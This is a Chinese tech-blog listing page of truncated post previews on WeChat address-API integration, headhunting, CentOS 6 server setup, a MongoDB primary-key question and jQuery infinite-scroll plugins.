       最近要接入微信的收货地址共享接口,总是不成功,折腾了好几天,实在没办法网上搜到的帖子也是骂声一片。我把我碰到并解决问题的过程分享出来,希望能给微信的接口文档起到一个辅助作用,让后面进来的开发者能快速的接入,而不需要像我们一样苦逼的浪费好几天,甚至一周的青春。各种羞辱、谩骂的话就不说了,本人还算文明。    如果你能搜到本贴,说明你已经碰到了各种 ed
  • 关于人才 netkiller.github.com 工作面试招聘netkiller人才
    关于人才 每个月我都会接到许多猎头的电话,有些猎头比较专业,但绝大多数在我看来与猎头二字还是有很大差距的。 与猎头接触多了,自然也了解了他们的工作,包括操作手法,总体上国内的猎头行业还处在初级阶段。 总结就是“盲目推荐,以量取胜”。 目前现状 许多从事人力资源工作的人,根本不懂得怎么找人才。处在人才找不到企业,企业找不到人才的尴尬处境。 企业招聘,通常是需要用人的部门提出招聘条件,由人
  • 搭建 CentOS 6 服务器 - 目录 rensanning centos
    (1) 安装CentOS ISO(desktop/minimal)、Cloud(AWS/阿里云)、Virtualization(VMWare、VirtualBox) 详细内容 (2) Linux常用命令 cd、ls、rm、chmod...... 详细内容 (3) 初始环境设置 用户管理、网络设置、安全设置...... 详细内容 (4) 常驻服务Daemon
  • 【求助】mongoDB无法更新主键 toknowme mongodb
      Query query = new Query();          query.addCriteria(new Criteria("_id").is(o.getId()));                &n
  • jquery 页面滚动到底部自动加载插件集合 xp9802 jquery
    很多社交网站都使用无限滚动的翻页技术来提高用户体验,当你页面滑到列表底部时候无需点击就自动加载更多的内容。下面为你推荐 10 个 jQuery 的无限滚动的插件: 1. jQuery ScrollPagination jQuery ScrollPagination plugin 是一个 jQuery 实现的支持无限滚动加载数据的插件。 2. jQuery Screw S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他